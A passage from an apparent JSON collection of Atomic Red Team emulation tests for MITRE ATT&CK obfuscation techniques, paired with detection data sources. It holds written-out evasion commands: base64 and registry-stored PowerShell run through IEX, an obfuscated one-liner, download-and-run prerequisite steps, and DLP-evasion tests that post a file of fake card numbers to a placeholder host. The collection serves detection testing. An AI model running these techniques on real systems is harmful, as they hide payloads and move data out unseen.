(`0x4c4f5452`, \"`LOTR`\"). This prevents the binary from being detected\nby some methods, and especially UPX is not able to uncompress it any more.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "bin_path": { + "description": "Packed binary", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed" + } + }, + "executor": { + "command": "cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin\n", + "cleanup_command": "rm /tmp/packed_bin\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1027.004", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Windows\\Temp\\T1027.004.exe #{input_file}\n", + "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} PathToAtomicsFolder\\T1027.004\\src\\calc.cs\n", + "Invoke-Expression PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\n", + "gcc PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\nclang PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\n", + "g++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\nclang++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\n", + "go run PathToAtomicsFolder/T1027.004/src/T1027-004-test.go\n" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Windows\\Temp\\T1027.004.exe #{input_file}\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} PathToAtomicsFolder\\T1027.004\\src\\calc.cs\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "Invoke-Expression PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "gcc PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\nclang PathToAtomicsFolder/T1027.004/src/T1027-004-test.c && ./a.out\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "g++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\nclang++ PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc && ./a.out\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + }, + { + "command": "go run PathToAtomicsFolder/T1027.004/src/T1027-004-test.go\n", + "source": "atomics/T1027.004/T1027.004.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Compile After Delivery" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027.004", + "display_name": "Obfuscated Files or Information: Compile After Delivery", + "atomic_tests": [ + { + "name": "Compile After Delivery using csc.exe", + "auto_generated_guid": "ffcdbd6a-b0e8-487d-927a-09127fe9a206", + "description": "Compile C# code using csc.exe binary used by .NET\nUpon execution an exe named T1027.004.exe will be placed in the temp folder\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Output compiled binary", + "type": "Path", + "default": "C:\\Windows\\Temp\\T1027.004.exe" + }, + "input_file": { + "description": "C# code that launches calc.exe from a hidden cmd.exe Window", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027.004\\src\\calc.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "C# file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs\" -OutFile \"#{input_file}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:#{output_file} #{input_file}\n", + "cleanup_command": "del #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Dynamic C# Compile", + "auto_generated_guid": "453614d8-3ba6-4147-acc0-7ec4b3e1faef", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process. \nCertain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.\nThe exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder.\nUpon execution, the exe will print 'T1027.004 Dynamic Compile'.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "exe program containing dynamically compiled C# code", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027.004\\bin\\T1027.004_DynamicCompile.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "exe file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file}\n" + } + ], + "executor": { + "command": "Invoke-Expression #{input_file}\n", + "name": "powershell" + } + }, + { + "name": "C compile", + "auto_generated_guid": "d0377aa6-850a-42b2-95f0-de558d80be57", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.c" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -O #{input_file}\n" + } + ], + "executor": { + "command": "gcc #{input_file} && ./a.out\nclang #{input_file} && ./a.out\n", + "name": "bash" + } + }, + { + "name": "CC compile", + "auto_generated_guid": "da97bb11-d6d0-4fc1-b445-e443d1346efe", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc -O #{input_file}\n" + } + ], + "executor": { + "command": "g++ #{input_file} && ./a.out\nclang++ #{input_file} && ./a.out\n", + "name": "bash" + } + }, + { + "name": "Go compile", + "auto_generated_guid": "78bd3fa7-773c-449e-a978-dc1f1500bc52", + "description": "Compile a c file with either gcc or clang on Linux or Macos.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "input_file": { + "description": "source file", + "type": "Path", + "default": "PathToAtomicsFolder/T1027.004/src/T1027-004-test.go" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "the source file must exist on disk at specified location (#{input_file})\n", + "prereq_command": "if [ -e #{input_file} ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go -O #{input_file}\n" + } + ], + "executor": { + "command": "go run #{input_file}\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1027", + "command_list": [ + "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))\"\n", + "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From test@corp.com -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm\n", + "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body #{input_file}\n", + "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "[a-z0-9]{1}.exe", + "*.exe \\*.exe\\:Zone.Identifier:$DATA\" " + ], + "commands": [ + { + "command": "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = 'Write-Host \"Hey, Atomic!\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From test@corp.com -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To test@corp.com -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer 127.0.0.1\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "Invoke-WebRequest -Uri 127.0.0.1 -Method POST -Body #{input_file}\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" -f'In','SiO','vOKe-EXp','ReS','n') ( (&(\"{1}{2}{0}\"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y')).\"v`ALUe\"::(\"{1}{0}\" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::\"t`OinT`16\"(( [sTring]${_}) ,8)))})) )\n", + "source": "atomics/T1027/T1027.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information" + }, + { + "command": "[a-z0-9]{1}.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.exe \\*.exe\\:Zone.Identifier:$DATA\" ", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1027", + "display_name": "Obfuscated Files or Information", + "atomic_tests": [ + { + "name": "Decode base64 Data into Script", + "auto_generated_guid": "f45df6be-2e1e-4136-a384-8f18ab3826fb", + "description": "Creates a base64-encoded data file and decodes it into an executable shell script\n\nUpon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "sh -c \"echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat\"\ncat /tmp/encoded.dat | base64 -d > /tmp/art.sh\nchmod +x /tmp/art.sh\n/tmp/art.sh\n", + "name": "sh" + } + }, + { + "name": "Execute base64-encoded PowerShell", + "auto_generated_guid": "a50d5a97-2531-499e-a1de-5544c74432c6", + "description": "Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.\n\nUpon successful execution, powershell will execute an encoded command and stdout default is \"Write-Host \"Hey, Atomic!\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_command": { + "description": "PowerShell command to encode", + "type": "String", + "default": "Write-Host \"Hey, Atomic!\"" + } + }, + "executor": { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand\n", + "name": "powershell" + } + }, + { + "name": "Execute base64-encoded PowerShell from Windows Registry", + "auto_generated_guid": "450e7218-7915-4be4-8b9b-464a49eafcec", + "description": "Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.\n\nUpon successful execution, powershell will execute encoded command and read/write from the registry.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "registry_key_storage": { + "description": "Windows Registry Key to store code", + "type": "String", + "default": "HKCU:Software\\Microsoft\\Windows\\CurrentVersion" + }, + "powershell_command": { + "description": "PowerShell command to encode", + "type": "String", + "default": "Write-Host \"Hey, Atomic!\"" + }, + "registry_entry_storage": { + "description": "Windows Registry entry to store code under key", + "type": "String", + "default": "Debug" + } + }, + "executor": { + "command": "$OriginalCommand = '#{powershell_command}'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\n\nSet-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand\npowershell.exe -Command \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))\"\n", + "cleanup_command": "Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}\n", + "name": "powershell" + } + }, + { + "name": "Execution from Compressed File", + "auto_generated_guid": "f8c8a909-5f29-49ac-9244-413936ce6d1f", + "description": "Mimic execution of compressed executable. When successfully executed, calculator.exe will open.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url_path": { + "description": "url to download Exe", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1027.exe must exist on disk at $env:temp\\temp_T1027.zip\\T1027.exe\n", + "prereq_command": "if (Test-Path $env:temp\\temp_T1027.zip\\T1027.exe) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"#{url_path}\" -OutFile \"$env:temp\\T1027.zip\"\nExpand-Archive -path \"$env:temp\\T1027.zip\" -DestinationPath \"$env:temp\\temp_T1027.zip\\\" -Force\n" + } + ], + "executor": { + "command": "\"%temp%\\temp_T1027.zip\\T1027.exe\"\n", + "cleanup_command": "taskkill /f /im calculator.exe >nul 2>nul\nrmdir /S /Q %temp%\\temp_T1027.zip >nul 2>nul\ndel /Q \"%temp%\\T1027.zip\" >nul 2>nul\n", + "name": "command_prompt" + } + }, + { + "name": "DLP Evasion via Sensitive Data in VBA Macro over email", + "auto_generated_guid": "129edb75-d7b8-42cd-a8ba-1f3db64ec4ad", + "description": "Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.\nSensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the XLSM file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm" + }, + "sender": { + "description": "sender email", + "type": "String", + "default": "test@corp.com" + }, + "receiver": { + "description": "receiver email", + "type": "String", + "default": "test@corp.com" + }, + "smtp_server": { + "description": "SMTP Server IP Address", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}\n", + "name": "powershell" + } + }, + { + "name": "DLP Evasion via Sensitive Data in VBA Macro over HTTP", + "auto_generated_guid": "e2d85e66-cb66-4ed7-93b1-833fc56c9319", + "description": "Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.\nSensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "input_file": { + "description": "Path of the XLSM file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1027\\src\\T1027-cc-macro.xlsm" + }, + "ip_address": { + "description": "Destination IP address", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}\n", + "name": "powershell" + } + }, + { + "name": "Obfuscated Command in PowerShell", + "auto_generated_guid": "8b3f4ed6-077b-4bdd-891c-2d237f19410f", + "description": "This is an obfuscated PowerShell command which when executed prints \"Hello, from PowerShell!\". Example is from the 2021 Threat Detection Report by Red Canary.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$cmDwhy =[TyPe](\"{0}{1}\" -f 'S','TrING') ; $pz2Sb0 =[TYpE](\"{1}{0}{2}\"-f'nv','cO','ert') ; &(\"{0}{2}{3}{1}{4}\" 